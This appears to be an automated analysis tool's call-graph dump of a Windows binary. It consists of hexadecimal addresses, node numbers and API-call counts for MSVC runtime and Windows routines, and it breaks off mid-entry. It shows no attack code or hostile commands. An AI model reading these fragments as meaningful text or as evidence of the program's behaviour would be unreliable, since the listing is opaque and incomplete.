c631c0 std::_Throw_Cpp_error 14 API calls 18414->18415 18415->18413 18431 c8d458 18416->18431 18418 c64b19 18418->18268 18419 c8cdc4 18418->18419 18420 c8cdda std::_Throw_Cpp_error 18419->18420 18438 c8cd77 18420->18438 18422 c8cdea __EH_prolog3 std::_Throw_Cpp_error Concurrency::cancel_current_task 18446 c775a0 18422->18446 18426 c93ddf ___std_exception_copy 18425->18426 18914 c93c6b 18426->18914 18428 c93dee 18429 c9322c ___std_exception_copy 14 API calls 18428->18429 18430 c64b60 18429->18430 18430->17939 18432 c8d472 18431->18432 18433 c8d482 _ValidateLocalCookies 18432->18433 18435 c8d8bb 18432->18435 18433->18418 18436 c8d8f9 __Xtime_get_ticks GetSystemTimePreciseAsFileTime 18435->18436 18437 c8d8c6 __aullrem 18436->18437 18437->18432 18439 c8cd83 __EH_prolog3_GS 18438->18439 18459 c63260 18439->18459 18443 c8cdac 18444 c631c0 std::_Throw_Cpp_error 14 API calls 18443->18444 18445 c8cdb4 std::_Throw_Cpp_error 18444->18445 18445->18422 18495 c64670 18446->18495 18448 c7760f 18449 c8df02 std::_Facet_Register 15 API calls 18448->18449 18450 c77616 18449->18450 18501 c8cfb9 18450->18501 18460 c63283 18459->18460 18460->18460 18461 c634e0 std::_Throw_Cpp_error 15 API calls 18460->18461 18462 c63295 18461->18462 18463 c63a60 18462->18463 18464 c74090 std::_Throw_Cpp_error 15 API calls 18463->18464 18465 c63aa4 18464->18465 18466 c63acc 18465->18466 18480 c76aa0 18465->18480 18468 c76aa0 std::_Throw_Cpp_error 15 API calls 18466->18468 18469 c63af5 18468->18469 18470 c63b1f std::_Throw_Cpp_error 18469->18470 18472 c63bdf 18469->18472 18471 c8f3a5 ___std_exception_copy 15 API calls 18470->18471 18475 c63b7d 18471->18475 18473 c93500 std::_Throw_Cpp_error 14 API calls 18472->18473 18473->18475 18474 c63bac std::_Throw_Cpp_error 18474->18443 18475->18474 18476 c93500 std::_Throw_Cpp_error 14 API calls 18475->18476 18477 c63be9 18476->18477 18491 c8f408 18477->18491 18479 c63c05 std::_Throw_Cpp_error 18479->18443 18481 c76aef 18480->18481 18485 c76ac2 std::_Locinfo::_Locinfo_ctor 18480->18485 18482 c76afe 18481->18482 18483 c76bed 18481->18483 18486 c636f0 std::_Throw_Cpp_error 15 API calls 18482->18486 18484 c63110 std::_Throw_Cpp_error 15 API calls 18483->18484 18489 c76b44 std::_Locinfo::_Locinfo_ctor 18484->18489 18485->18466 18486->18489 18487 c93500 std::_Throw_Cpp_error 14 API calls 18488 c76bf7 std::_Throw_Cpp_error 18487->18488 18488->18466 18489->18487 18490 c76ba4 std::_Throw_Cpp_error std::_Locinfo::_Locinfo_ctor 18489->18490 18490->18466 18492 c8f415 18491->18492 18494 c8f41c 18491->18494 18493 c9c526 ___std_exception_destroy 9 API calls 18492->18493 18493->18494 18494->18479 18496 c6468a std::_Throw_Cpp_error Concurrency::cancel_current_task 18495->18496 18496->18448 18537 c64590 18496->18537 18498 c646d8 Concurrency::cancel_current_task 18499 c8f3a5 ___std_exception_copy 15 API calls 18498->18499 18500 c64714 18499->18500 18500->18448 18502 c8cfc5 __EH_prolog3 18501->18502 18550 c8cd00 18502->18550 18505 c8d001 18556 c8cd58 18505->18556 18538 c645f1 18537->18538 18538->18538 18539 c634e0 std::_Throw_Cpp_error 15 API calls 18538->18539 18540 c64605 18539->18540 18541 c63a60 std::_Throw_Cpp_error 15 API calls 18540->18541 18543 c6461b 18541->18543 18542 c64641 std::_Throw_Cpp_error 18542->18498 18543->18542 18544 c93500 std::_Throw_Cpp_error 14 API calls 18543->18544 18545 c6466d std::_Throw_Cpp_error Concurrency::cancel_current_task 18544->18545 18545->18498 18546 c64590 std::_Throw_Cpp_error 15 API calls 18545->18546 18547 c646d8 Concurrency::cancel_current_task 18546->18547 18548 c8f3a5 ___std_exception_copy 15 API calls 18547->18548 18551 c8cd0f 18550->18551 18552 c8cd16 18550->18552 18580 c9eb3a 18551->18580 18554 c8cd14 18552->18554 18585 c8db46 RtlEnterCriticalSection 18552->18585 18554->18505 18563 c8d11c 18554->18563 18557 c9eb48 18556->18557 18558 c8cd62 18556->18558 18564 c8df02 std::_Facet_Register 15 API calls 18563->18564 18565 c8d127 18564->18565 18566 c8d13b 18565->18566 18639 c8cea1 18565->18639 18586 ca61df 18580->18586 18585->18554 18607 ca5af0 18586->18607 18608 ca5cd9 std::locale::_Setgloballocale 2 API calls 18607->18608 18915 c93c77 std::_Locinfo::_Locinfo_ctor 18914->18915 18916 c93c80 18915->18916 18917 c93ca4 18915->18917 18918 c93473 ___std_exception_copy 14 API calls 18916->18918 18928 c9bae0 RtlEnterCriticalSection 18917->18928 18927 c93c99 18918->18927 18920 c93cad 18921 c93cc2 18920->18921 18929 ca4a79 18920->18929 18923 c93d5f 18921->18923 18924 c93d2e 18921->18924 18936 c93d97 18923->18936 18925 c93473 ___std_exception_copy 14 API calls 18924->18925 18925->18927 18927->18428 18928->18920 18930 ca4a9a 18929->18930 18931 ca4a85 18929->18931 18930->18921 18932 c9bf8f ___std_exception_copy 9 API calls 18931->18932 18933 ca4a8a 18932->18933 18934 c934f0 ___std_exception_copy 14 API calls 18933->18934 18935 ca4a95 18934->18935 18935->18921 18939 c9baf4 RtlLeaveCriticalSection 18936->18939 18938 c93d9d 18938->18927 18939->18938 19040 c7dd90 18940->19040 18942 c7c918 18942->17939 18943 c7d3d0 18943->18942 18944 c854c0 15 API calls 18943->18944 18944->18942 18946 c854e5 18945->18946 18947 c855b6 18945->18947 18948 c854ff 18946->18948 18950 c85540 18946->18950 18951 c85537 18946->18951 19050 c63750 18947->19050 18953 c8df02 std::_Facet_Register 15 API calls 18948->18953 18958 c8df02 std::_Facet_Register 15 API calls 18950->18958 18959 c8551a std::_Locinfo::_Locinfo_ctor 18950->18959 18951->18948 18952 c855bb 18951->18952 18954 c855c0 18952->18954 18955 c63070 Concurrency::cancel_current_task 15 API calls 18952->18955 18956 c8550f 18953->18956 18957 c93500 std::_Throw_Cpp_error 14 API calls 18954->18957 18955->18954 18956->18954 18956->18959 18962 c855c5 18957->18962 18958->18959 19045 c839d0 18959->19045 18960 c8569f 18961 c63750 15 API calls 18960->18961 18963 c856a4 18961->18963 18962->18960 19053 c880b0 18962->19053 18966 c855a8 18966->18314 18967 c85624 std::_Locinfo::_Locinfo_ctor 18968 c85674 std::_Throw_Cpp_error 18967->18968 18969 c93500 std::_Throw_Cpp_error 14 API calls 18967->18969 18968->18314 18969->18960 18971 c7dd33 18970->18971 18972 c7dd61 18971->18972 18973 c854c0 15 API calls 18971->18973 18972->18295 18973->18972 18975 c7cae0 18974->18975 18976 c854c0 15 API calls 18975->18976 18977 c7cb50 18975->18977 18976->18975 18977->18318 18979 c7dd20 15 API calls 18978->18979 18983 c7d1ec 18979->18983 18980 c7d285 18981 c7d1fa 18980->18981 18982 c854c0 15 API calls 18980->18982 18981->18318 18982->18980 18983->18980 18983->18981 18984 c854c0 15 API calls 18983->18984 18984->18983 18986 c7cb74 18985->18986 18988 c7c8cf 18985->18988 18987 c854c0 15 API calls 18986->18987 18986->18988 18987->18986 18988->17939 18990 c7dd90 15 API calls 18989->18990 18991 c7cc20 18990->18991 18992 c7cc63 18991->18992 18995 c7cc49 18991->18995 19005 c7cc6b 18991->19005 19061 c63300 18991->19061 18996 c63300 15 API calls 18992->18996 18994 c7cc9b 18994->18992 18997 c7ccb8 18994->18997 18994->19005 18995->18994 19000 c854c0 15 API calls 18995->19000 18999 c7ccfb 18996->18999 18997->18315 18998 c63300 15 API calls 18998->19005 19001 c7dd20 15 API calls 18999->19001 19000->18994 19002 c7cd02 19001->19002 19003 c7cdb0 19002->19003 19010 c7cd0b 19002->19010 19004 c63300 15 API calls 19003->19004 19006 c7cdbf 19004->19006 19005->18998 19005->19003 19008 c854c0 15 API calls 19005->19008 19005->19010 19012 c7cfad 19005->19012 19009 c7dd20 15 API calls 19006->19009 19007 c63300 15 API calls 19018 c7ce92 19007->19018 19008->19005 19011 c7cdcb 19009->19011 19010->19007 19010->19012 19011->18315 19013 c9bf8f ___std_exception_copy 9 API calls 19012->19013 19014 c7d022 19013->19014 19016 c7d067 19014->19016 19017 c7d02d 19014->19017 19015 c7ced4 19019 c7cef1 19015->19019 19022 c7cf65 19015->19022 19023 c7cf24 19015->19023 19021 c7d050 19016->19021 19076 c98b01 19016->19076 19072 c98b4d 19017->19072 19018->19015 19020 c854c0 15 API calls 19018->19020 19019->18315 19020->19015 19037 c7d055 19021->19037 19080 c977fc 19021->19080 19029 c63300 15 API calls 19022->19029 19026 c63300 15 API calls 19023->19026 19031 c7cf2d 19026->19031 19038 c7cf73 19029->19038 19035 c7dd20 15 API calls 19031->19035 19033 c9bf8f ___std_exception_copy 9 API calls 19033->19021 19034 c9bf8f ___std_exception_copy 9 API calls 19034->19021 19036 c7cf34 19035->19036 19036->18315 19037->18315 19038->19012 19039 c854c0 15 API calls 19038->19039 19039->19012 19041 c7ddbb 19040->19041 19042 c7ddde 19041->19042 19043 c854c0 15 API calls 19041->19043 19042->18943 19044 c7ddfb 19043->19044 19044->18943 19046 c839dc 19045->19046 19047 c839f9 std::_Throw_Cpp_error 19045->19047 19046->19047 19048 c93500 std::_Throw_Cpp_error 14 API calls 19046->19048 19047->18966 19049 c83a24 19048->19049 19051 c8c579 std::_Throw_Cpp_error 15 API calls 19050->19051 19052 c6375a 19051->19052 19054 c880f9 19053->19054 19055 c880b9 19053->19055 19054->19054 19055->19054 19056 c880d0 19055->19056 19058 c8df02 std::_Facet_Register 15 API calls 19055->19058 19057 c8df02 std::_Facet_Register 15 API calls 19056->19057 19060 c880d9 19056->19060 19059 c880f2 19057->19059 19058->19056 19059->18967 19060->18967 19062 c63318 19061->19062 19063 c63339 19061->19063 19062->18995 19064 c6340e 19063->19064 19065 c6334b 19063->19065 19066 c63110 std::_Throw_Cpp_error 15 API calls 19064->19066 19068 c636f0 std::_Throw_Cpp_error 15 API calls 19065->19068 19070 c6337e std::_Locinfo::_Locinfo_ctor 19066->19070 19067 c93500 std::_Throw_Cpp_error 14 API calls 19069 c63418 19067->19069 19068->19070 19070->19067 19071 c633d0 std::_Throw_Cpp_error std::_Locinfo::_Locinfo_ctor 19070->19071 19071->18995 19073 c98b61 ___std_exception_copy 19072->19073 19074 c9322c ___std_exception_copy 14 API calls 19073->19074 19075 c7d044 19074->19075 19075->19033 19077 c98b15 ___std_exception_copy 19076->19077 19078 c9322c ___std_exception_copy 14 API calls 19077->19078 19079 c7d083 19078->19079 19079->19034 19083 c944de 19080->19083 19084 c944f2 19083->19084 19085 c944f8 19084->19085 19086 c9450c 19084->19086 19087 c9bf8f ___std_exception_copy 9 API calls 19085->19087 19096 c93e3e 19086->19096 19089 c944fd 19087->19089 19091 c934f0 ___std_exception_copy 14 API calls 19089->19091 19090 c94517 19104 c945c4 19090->19104 19095 c7d0bb 19091->19095 19095->18315 19097 c93e5c 19096->19097 19098 c93e55 19096->19098 19097->19098 19099 ca46d2 __Getctype 14 API calls 19097->19099 19098->19090 19100 c93e7d 19099->19100 19101 ca49bd __Getctype 14 API calls 19100->19101 19102 c93e93 19101->19102 19105 c945e4 19104->19105 19106 c9bf8f ___std_exception_copy 9 API calls 19105->19106 19109 c945f8 _ValidateLocalCookies 19105->19109 19187 c7b0d2 19186->19187 19188 c7b138 19186->19188 19189 c7b0da 19187->19189 19194 c7b109 19187->19194 19190 c63750 15 API calls 19188->19190 19191 c7b0e1 19189->19191 19192 c7b13d 19189->19192 19190->19192 19195 c8df02 std::_Facet_Register 15 API calls 19191->19195 19197 c63070 Concurrency::cancel_current_task 15 API calls 19192->19197 19193 c7b126 19193->18338 19194->19193 19196 c8df02 std::_Facet_Register 15 API calls 19194->19196 19198 c7b0e7 19195->19198 19199 c7b113 19196->19199 19197->19198 19200 c7b0f0 19198->19200 19201 c93500 std::_Throw_Cpp_error 14 API calls 19198->19201 19199->18338 19200->18338 19202 c7b147 19201->19202 19239 c74690 19202->19239 19205 c64670 std::_Throw_Cpp_error 15 API calls 19207 c7b236 19205->19207 19206 c7b247 19206->18338 19207->19206 19243 c77450 19207->19243 19210 d60d2d 19209->19210 19212 d60c04 19209->19212 19210->18338 19211 d60c08 19211->18338 19212->19211 19213 c9cc7c ___std_exception_copy 10 API calls 19212->19213 19219 d60c50 19212->19219 19213->19219 19214 d60c63 19214->18338 19215 d60d18 19215->18338 19216 c9c526 ___std_exception_destroy 9 API calls 19217 d60d08 19216->19217 19217->18338 19218 d60cc2 19218->19215 19218->19216 19219->19214 19219->19218 19220 c9c526 ___std_exception_destroy 9 API calls 19219->19220 19220->19218 19222 c80579 19221->19222 19223 c80623 19221->19223 19224 c80597 19222->19224 19226 c805cb 19222->19226 19227 c805d4 19222->19227 19225 c63750 15 API calls 19223->19225 19229 c8df02 std::_Facet_Register 15 API calls 19224->19229 19228 c80628 19225->19228 19226->19224 19226->19228 19231 c8df02 std::_Facet_Register 15 API calls 19227->19231 19236 c805ae std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 19227->19236 19230 c63070 Concurrency::cancel_current_task 15 API calls 19228->19230 19232 c805a7 19229->19232 19233 c8062d 19230->19233 19231->19236 19232->19233 19232->19236 19234 c93500 std::_Throw_Cpp_error 14 API calls 19233->19234 19235 c80632 19234->19235 19237 c839d0 14 API calls 19236->19237 19238 c8061a 19237->19238 19238->18338 19241 c746c2 19239->19241 19240 c746dd 19240->19205 19241->19240 19247 c72e20 19241->19247 19244 c774b1 19243->19244 19245 c77486 19243->19245 19244->19206 19245->19244 19246 c64670 std::_Throw_Cpp_error 15 API calls 19245->19246 19246->19244 19248 c72e57 19247->19248 19249 c72eee 19247->19249 19250 c74690 15 API calls 19248->19250 19249->19240 19251 c72e60 19250->19251 19252 c72edd 19251->19252 19253 c64670 std::_Throw_Cpp_error 15 API calls 19251->19253 19252->19249 19254 c77450 15 API calls 19252->19254 19253->19252 19254->19249 19256 c93ffa std::_Locinfo::_Locinfo_ctor 19255->19256 19257 c94001 19256->19257 19260 c94021 19256->19260 19258 c9bf8f ___std_exception_copy 9 API calls 19257->19258 19259 c94006 19258->19259 19261 c934f0 ___std_exception_copy 14 API calls 19259->19261 19262 c94033 19260->19262 19263 c94026 19260->19263 19264 c94011 19261->19264 19272 ca517f 19262->19272 19265 c9bf8f ___std_exception_copy 9 API calls 19263->19265 19264->17959 19264->18347 19265->19264 19268 c94050 19280 c9408e 19268->19280 19269 c94043 19270 c9bf8f ___std_exception_copy 9 API calls 19269->19270 19270->19264 19273 ca518b std::_Locinfo::_Locinfo_ctor 19272->19273 19284 c9eadb RtlEnterCriticalSection 19273->19284 19275 ca5199 19285 ca5223 19275->19285 19281 c94092 19280->19281 19305 c9baf4 RtlLeaveCriticalSection 19281->19305 19283 c940a3 19283->19264 19284->19275 19293 ca5246 19285->19293 19286 ca529e 19287 ca4eea __Getctype 9 API calls 19286->19287 19289 ca52a7 19287->19289 19290 ca58aa ___std_exception_destroy 9 API calls 19289->19290 19291 ca52b0 19290->19291 19292 ca6084 std::locale::_Setgloballocale 2 API calls 19291->19292 19297 ca51a6 19291->19297 19294 ca52cf 19292->19294 19293->19286 19293->19297 19301 c9bae0 RtlEnterCriticalSection 19293->19301 19302 c9baf4 RtlLeaveCriticalSection 19293->19302 19303 c9bae0 RtlEnterCriticalSection 19294->19303 19298 ca51df 19297->19298 19304 c9eb23 RtlLeaveCriticalSection 19298->19304 19300 c9403c 19300->19268 19300->19269 19301->19293 19302->19293 19303->19297 19304->19300 19305->19283 19307 c9bca8 19306->19307 19308 c9bcd0 19306->19308 19307->19308 19309 c9bcb5 19307->19309 19310 c9bcd7 19307->19310 19308->18350 19311 c93473 ___std_exception_copy 14 API calls 19309->19311 19314 c9bbf3 19310->19314 19311->19308 19315 c9bbff std::_Locinfo::_Locinfo_ctor 19314->19315 19322 c9bae0 RtlEnterCriticalSection 19315->19322 19317 c9bc0d 19323 c9bc4e 19317->19323 19322->19317 19333 ca713a 19323->19333 19353 ca70fc 19333->19353 19354 ca7108 19353->19354 19479 c97709 19469->19479 19471 c97f8f 19475 c98a60 std::_Locinfo::_Locinfo_ctor 16 API calls 19471->19475 19477 c97fb3 19471->19477 19472 c97f5c 19474 c93473 ___std_exception_copy 14 API calls 19472->19474 19473 c97f47 19473->19471 19473->19472 19478 c97f77 std::_Locinfo::_Locinfo_ctor 19473->19478 19474->19478 19475->19477 19477->19478 19486 c97724 19477->19486 19478->18366 19480 c9770e 19479->19480 19481 c97721 19479->19481 19482 c9bf8f ___std_exception_copy 9 API calls 19480->19482 19481->19473 19483 c97713 19482->19483 19484 c934f0 ___std_exception_copy 14 API calls 19483->19484 19485 c9771e 19484->19485 19485->19473 19487 c97730 19486->19487 19488 c97746 19486->19488 19489 c9edde __Getctype 14 API calls 19487->19489 19492 c97756 19488->19492 19493 ca42c9 19488->19493 19490 c9773b std::_Locinfo::_Locinfo_ctor 19489->19490 19490->19477 19492->19477 19494 c93e3e std::_Locinfo::_Locinfo_ctor 16 API calls 19493->19494 19495 ca42e6 19494->19495 19497 ca42f6 _ValidateLocalCookies 19495->19497 19498 ca9cdb 19495->19498 19497->19492 19499 c93e3e std::_Locinfo::_Locinfo_ctor 16 API calls 19498->19499 19500 ca9cfb 19499->19500 19509 ca5a0a 19500->19509 19502 ca9d28 19504 ca5924 std::_Locinfo::_Locinfo_ctor 10 API calls 19502->19504 19505 ca9db7 _ValidateLocalCookies 19502->19505 19506 ca9d4d std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 19502->19506 19508 ca9d96 19502->19508 19504->19506 19505->19497 19507 ca5a0a std::_Locinfo::_Locinfo_ctor MultiByteToWideChar 19506->19507 19506->19508 19507->19508 19512 c8db05 19508->19512 19516 ca5972 19509->19516 19513 c8db0f 19512->19513 19514 c8db20 19512->19514 19513->19514 19515 c9c526 ___std_exception_destroy 9 API calls 19513->19515 19514->19505 19515->19514 19517 ca5983 MultiByteToWideChar 19516->19517 19517->19502 19519 c7b4ce 19518->19519 19521 c7b4f8 std::_Locinfo::_Locinfo_ctor 19518->19521 19520 c636f0 std::_Throw_Cpp_error 15 API calls 19519->19520 19520->19521 19521->18375 19523 c63839 19522->19523 19526 c9b667 19523->19526 19527 c9b67b ___std_exception_copy 19526->19527 19532 c98df5 19527->19532 19529 c9b696 19530 c9322c ___std_exception_copy 14 API calls 19529->19530 19533 c98e21 19532->19533 19534 c98e44 19532->19534 19535 c93473 ___std_exception_copy 14 API calls 19533->19535 19534->19533 19536 c98e4c 19534->19536 19537 c98e39 _ValidateLocalCookies 19535->19537 19541 c9a337 19536->19541 19537->19529 19559 c9b39d 19541->19559 19757 c9781f std::_Locinfo::_Locinfo_ctor 19756->19757 19758 c97829 19757->19758 19759 c9784c 19757->19759 19760 c93473 ___std_exception_copy 14 API calls 19758->19760 19766 c97844 19759->19766 19767 c9bae0 RtlEnterCriticalSection 19759->19767 19760->19766 19846 c75add 19845->19846 19847 c75bb9 19845->19847 19848 c75b50 19846->19848 19849 c75ae4 19846->19849 19850 c75afe 19846->19850 19851 c75b1e 19846->19851 19852 c75b2a 19846->19852 19856 c63260 std::_Throw_Cpp_error 15 API calls 19847->19856 19858 c75ae9 19847->19858 19848->18394 19947 c79470 19849->19947 19857 c8df02 std::_Facet_Register 15 API calls 19850->19857 19952 c7a090 19851->19952 19854 c8df02 std::_Facet_Register 15 API calls 19852->19854 19854->19858 19859 c75bd4 19856->19859 19857->19858 19858->18394 19957 c67270 19859->19957 19861 c75be7 Concurrency::cancel_current_task 19863 c7e98c 19862->19863 20005 c9bbcb 19863->20005 19867 c7874e 19868 c7a800 19867->19868 19869 c7a846 19868->19869 19870 c7aa68 19868->19870 20072 c7b670 19869->20072 20040 c81ed0 19870->20040 19875 c7c660 17 API calls 19877 c7aa96 19875->19877 19880 c7b7b0 18 API calls 19877->19880 19939 c7ab7a std::_Throw_Cpp_error 19877->19939 19879 c7c660 17 API calls 19881 c7a8a7 19879->19881 19882 c7aae3 19880->19882 19891 c7a9b3 std::_Throw_Cpp_error 19881->19891 20197 c7b7b0 19881->20197 19885 c66670 17 API calls 19882->19885 19883 c75ab0 15 API calls 19884 c7abca 19883->19884 19887 c71940 15 API calls 19884->19887 19889 c7ab07 19885->19889 19886 c7aa63 std::_Throw_Cpp_error 19886->18398 19890 c7abf4 19887->19890 19894 c7bd60 18 API calls 19889->19894 19890->19886 19895 c93500 std::_Throw_Cpp_error 14 API calls 19890->19895 19892 c7aa0f 19891->19892 19896 c75ab0 15 API calls 19891->19896 19897 c71940 15 API calls 19892->19897 19899 c7ab20 19894->19899 19900 c7ac6a 19895->19900 19901 c7a9e5 19896->19901 19902 c7aa1a 19897->19902 19904 c7ac8e 19899->19904 19906 c631c0 std::_Throw_Cpp_error 14 API calls 19899->19906 20293 c76c30 19900->20293 20285 c71940 19901->20285 20288 c71310 19902->20288 19909 c76c30 15 API calls 19904->19909 19911 c7ab3d 19906->19911 19907 c7ac78 Concurrency::cancel_current_task 19920 c93500 std::_Throw_Cpp_error 14 API calls 19907->19920 19912 c7ac99 Concurrency::cancel_current_task 19909->19912 19916 c8f408 ___std_exception_destroy 9 API calls 19911->19916 19925 c93500 std::_Throw_Cpp_error 14 API calls 19912->19925 19919 c7ab53 19916->19919 19917 c7aa4d 19921 c71310 14 API calls 19917->19921 19924 c8f408 ___std_exception_destroy 9 API calls 19919->19924 19920->19904 19928 c7ab6c 19924->19928 19934 c7acac 19925->19934 19930 c631c0 std::_Throw_Cpp_error 14 API calls 19928->19930 19930->19939 19931 c7acd7 std::_Throw_Cpp_error 19931->18398 19934->19931 19935 c93500 std::_Throw_Cpp_error 14 API calls 19934->19935 19937 c7acfc 19935->19937 19937->18398 19939->19883 19939->19890 19939->19912 19941 c7a4eb std::_Throw_Cpp_error 19940->19941 19942 c93500 std::_Throw_Cpp_error 14 API calls 19941->19942 19943 c7a549 std::_Throw_Cpp_error 19941->19943 19944 c7a571 19942->19944 19943->18400 20650 c7b280 19944->20650 19946 c7a58b 19948 c8df02 std::_Facet_Register 15 API calls 19947->19948 19949 c79493 19948->19949 19950 c8df02 std::_Facet_Register 15 API calls 19949->19950 19951 c794b9 19950->19951 19951->19858 19953 c8df02 std::_Facet_Register 15 API calls 19952->19953 19954 c7a0ca 19953->19954 19955 c634e0 std::_Throw_Cpp_error 15 API calls 19954->19955 19956 c7a10a 19955->19956 19956->19858 19970 c66410 19957->19970 19959 c672f4 19960 c76aa0 std::_Throw_Cpp_error 15 API calls 19959->19960 19961 c67312 std::_Throw_Cpp_error 19960->19961 19963 c67456 19961->19963 19964 c673b9 std::_Throw_Cpp_error 19961->19964 19962 c8f3a5 ___std_exception_copy 15 API calls 19966 c67402 19962->19966 19965 c93500 std::_Throw_Cpp_error 14 API calls 19963->19965 19964->19962 19965->19966 19967 c67438 std::_Throw_Cpp_error 19966->19967 19968 c93500 std::_Throw_Cpp_error 14 API calls 19966->19968 19967->19861 19969 c67460 19968->19969 19969->19861 19991 c647a0 19970->19991 19972 c66453 19973 c66470 19972->19973 19974 c66621 19972->19974 19976 c7b4a0 15 API calls 19973->19976 19975 c63110 std::_Throw_Cpp_error 15 API calls 19974->19975 19990 c664eb std::_Throw_Cpp_error 19975->19990 19977 c6648d 19976->19977 19979 c76aa0 std::_Throw_Cpp_error 15 API calls 19977->19979 19978 c93500 std::_Throw_Cpp_error 14 API calls 19980 c6662b 19978->19980 19981 c664a0 19979->19981 19982 c8f408 ___std_exception_destroy 9 API calls 19980->19982 19996 c7b310 19981->19996 19984 c66646 19982->19984 19986 c8f408 ___std_exception_destroy 9 API calls 19984->19986 19985 c664d8 19987 c76aa0 std::_Throw_Cpp_error 15 API calls 19985->19987 19988 c66655 std::_Throw_Cpp_error 19986->19988 19987->19990 19988->19959 19989 c66602 std::_Throw_Cpp_error 19989->19959 19990->19978 19990->19989 19992 c647b3 19991->19992 19993 c647e5 19992->19993 19994 c634e0 std::_Throw_Cpp_error 15 API calls 19992->19994 19993->19972 19995 c6480b 19994->19995 19995->19972 19997 c7b353 19996->19997 19998 c7b494 19997->19998 19999 c7b418 19997->19999 20000 c7b358 std::_Locinfo::_Locinfo_ctor 19997->20000 20001 c63110 std::_Throw_Cpp_error 15 API calls 19998->20001 20003 c636f0 std::_Throw_Cpp_error 15 API calls 19999->20003 20000->19985 20002 c7b499 20001->20002 20004 c7b443 std::_Locinfo::_Locinfo_ctor 20003->20004 20004->19985 20006 ca46d2 __Getctype 14 API calls 20005->20006 20007 c9bbd6 20006->20007 20008 ca49bd __Getctype 14 API calls 20007->20008 20009 c7ea88 20008->20009 20010 c7c660 20009->20010 20012 c7c674 20010->20012 20014 c7c6d4 20010->20014 20011 c7cad0 15 API calls 20036 c7c7bc 20011->20036 20016 c854c0 15 API calls 20012->20016 20032 c7c6b2 20012->20032 20013 c7c85c 20015 c7c877 20013->20015 20018 c7c8d5 20013->20018 20019 c7c8f5 20013->20019 20020 c7c911 20013->20020 20021 c7c91e 20013->20021 20022 c7c8b9 20013->20022 20014->20011 20035 c7c764 20014->20035 20015->19867 20016->20032 20017 c7d1e0 15 API calls 20017->20036 20024 c7cb60 15 API calls 20018->20024 20025 c7cb60 15 API calls 20019->20025 20026 c7d3c0 15 API calls 20020->20026 20027 c7cc10 17 API calls 20021->20027 20023 c7cb60 15 API calls 20022->20023 20028 c7c8cf 20023->20028 20029 c7c8ef 20024->20029 20030 c7c90b 20025->20030 20031 c7c918 20026->20031 20033 c7c925 20027->20033 20028->19867 20029->19867 20030->19867 20031->19867 20032->20014 20034 c854c0 15 API calls 20032->20034 20037 c7c748 20032->20037 20033->19867 20034->20037 20035->19867 20036->20013 20036->20015 20036->20017 20039 c854c0 15 API calls 20036->20039 20037->20035 20038 c7dd20 15 API calls 20037->20038 20038->20014 20039->20036 20041 c82eaa 20040->20041 20047 c81f35 std::_Throw_Cpp_error 20040->20047 20042 c7b7b0 18 API calls 20041->20042 20043 c82eeb 20042->20043 20044 c66670 17 API calls 20043->20044 20045 c82f0f 20044->20045 20046 c7bd60 18 API calls 20045->20046 20056 c82f25 std::_Throw_Cpp_error 20046->20056 20050 c827ff std::_Throw_Cpp_error 20047->20050 20051 c83054 20047->20051 20048 c71310 14 API calls 20049 c7aa8e 20048->20049 20049->19875 20050->20048 20053 c93500 std::_Throw_Cpp_error 14 API calls 20051->20053 20052 c76c30 15 API calls 20055 c83121 Concurrency::cancel_current_task 20052->20055 20057 c83059 20053->20057 20054 c8f408 ___std_exception_destroy 9 API calls 20058 c82f93 20054->20058 20056->20051 20056->20054 20071 c83102 Concurrency::cancel_current_task 20056->20071 20059 c76c30 15 API calls 20057->20059 20060 c8f408 ___std_exception_destroy 9 API calls 20058->20060 20061 c83067 Concurrency::cancel_current_task 20059->20061 20060->20047 20298 c83f30 20061->20298 20063 c83086 Concurrency::cancel_current_task 20064 c76c30 15 API calls 20063->20064 20065 c830a5 Concurrency::cancel_current_task 20064->20065 20066 c76c30 15 API calls 20065->20066 20067 c830c4 Concurrency::cancel_current_task 20066->20067 20068 c76c30 15 API calls 20067->20068 20069 c830e3 Concurrency::cancel_current_task 20068->20069 20070 c76c30 15 API calls 20069->20070 20070->20071 20071->20052 20073 c7b70f 20072->20073 20074 c75ab0 15 API calls 20073->20074 20075 c7b72f 20074->20075 20303 c7dfb0 20075->20303 20077 c7a88a 20078 c80db0 20077->20078 20147 c80e0e 20078->20147 20079 c81ced 20080 c7b7b0 18 API calls 20079->20080 20082 c81d2b 20080->20082 20088 c66670 17 API calls 20082->20088 20083 c86490 15 API calls 20083->20147 20085 c81e91 20440 c8c53c 20085->20440 20090 c81d4f 20088->20090 20092 c7bd60 18 API calls 20090->20092 20102 c81d64 std::_Throw_Cpp_error 20092->20102 20094 c7bd60 18 API calls 20095 c81641 20094->20095 20097 c7c4c0 17 API calls 20095->20097 20096 c819ec 20101 c76c30 15 API calls 20096->20101 20099 c81654 20097->20099 20098 c71310 14 API calls 20100 c7a89f 20098->20100 20104 c76aa0 std::_Throw_Cpp_error 15 API calls 20099->20104 20100->19879 20106 c8170a Concurrency::cancel_current_task 20101->20106 20102->20096 20103 c8f408 ___std_exception_destroy 9 API calls 20102->20103 20102->20106 20107 c81dd7 20103->20107 20108 c8169e 20104->20108 20105 c859c0 15 API calls 20105->20147 20110 c93500 std::_Throw_Cpp_error 14 API calls 20106->20110 20111 c8f408 ___std_exception_destroy 9 API calls 20107->20111 20427 c67080 20108->20427 20110->20085 20192 c815e7 std::_Throw_Cpp_error 20111->20192 20113 c88220 15 API calls 20113->20147 20114 c8145f std::_Throw_Cpp_error 20114->20106 20151 c814da std::_Throw_Cpp_error 20114->20151 20116 c8195e 20122 c7b7b0 18 API calls 20116->20122 20118 c7c660 17 API calls 20118->20147 20119 c7b7b0 18 API calls 20123 c8184f 20119->20123 20120 c83590 19 API calls 20120->20147 20125 c8199e 20122->20125 20130 c66670 17 API calls 20123->20130 20133 c66670 17 API calls 20125->20133 20126 c81a95 20131 c7b7b0 18 API calls 20126->20131 20127 c814df 20129 c7b7b0 18 API calls 20127->20129 20128 c834b0 15 API calls 20128->20147 20135 c81524 20129->20135 20136 c81873 20130->20136 20138 c81ada 20131->20138 20141 c819c2 20133->20141 20134 c83780 15 API calls 20134->20147 20142 c66670 17 API calls 20135->20142 20143 c7bd60 18 API calls 20136->20143 20144 c66670 17 API calls 20138->20144 20146 c7bd60 18 API calls 20141->20146 20148 c81548 20142->20148 20149 c81888 20143->20149 20150 c81afe 20144->20150 20157 c819d7 20146->20157 20147->20079 20147->20083 20147->20085 20147->20105 20147->20113 20147->20116 20147->20118 20147->20120 20147->20126 20147->20127 20147->20128 20147->20134 20147->20151 20155 